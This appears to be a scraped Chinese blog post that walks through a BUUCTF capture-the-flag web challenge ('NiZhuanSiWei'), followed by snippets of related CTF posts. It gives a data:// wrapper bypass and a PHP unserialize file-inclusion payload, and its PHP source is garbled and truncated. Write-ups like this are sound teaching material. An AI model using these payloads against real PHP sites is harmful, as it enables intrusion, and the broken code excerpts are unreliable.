BUUCTF刷題記錄 NiZhuanSiWei

2021-10-06 06:48:05 字數 900 閱讀 2886

進入**

if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf"))
用data偽協議傳參

?text=data://text/plain;base64,d2vsy29tzsb0byb0agugempjdgy=
原始碼分析

if(preg_match("/flag/",$file))else  

} } ?>

執行下面**

<?php 

class flag

} } $a = new flag();

echo serialize($a);

?>

o:4:"flag":1:
最終的payload為

?text=data://text/plain;base64,d2vsy29tzsb0byb0agugempjdgy=&file=useless.php&password=o:4:"flag":1:
整個路徑(結合題目)

進入

BUUCTF 刷題記錄(2020 11 11)

解密出來是 61666374667b317327745f73305f333435797d 然後提交flag,一直報錯,然後再看解密出來的字串。又因為7d在ascii上表示位 所以轉一下字串,答案為 afctf 所以提交flag為flag import gmpy2 n,p,q,e 920139713 ...

CTF web做題記錄 狼組 BUUCTF 一

1 ctf.wgpsec 你可能需要一部iphone 題目如下 考察點 user agent,burp改為iphone的user agent,發包得到flag 坑 理解錯誤,淦 考察點 理解,根據 本身繞過 highlight file source.txt echo flag xx msg giv...

OI刷題記錄

2014 4 18 poj3264 bzoj1699 balanced lineup rmq 2014 4 19 bzoj1012 jsoi2008 最大數maxnumber noi2004 鬱悶的出納員 bzoj3224 tyvj 1728 普通平衡樹 2014 4 20 bzoj1862 105...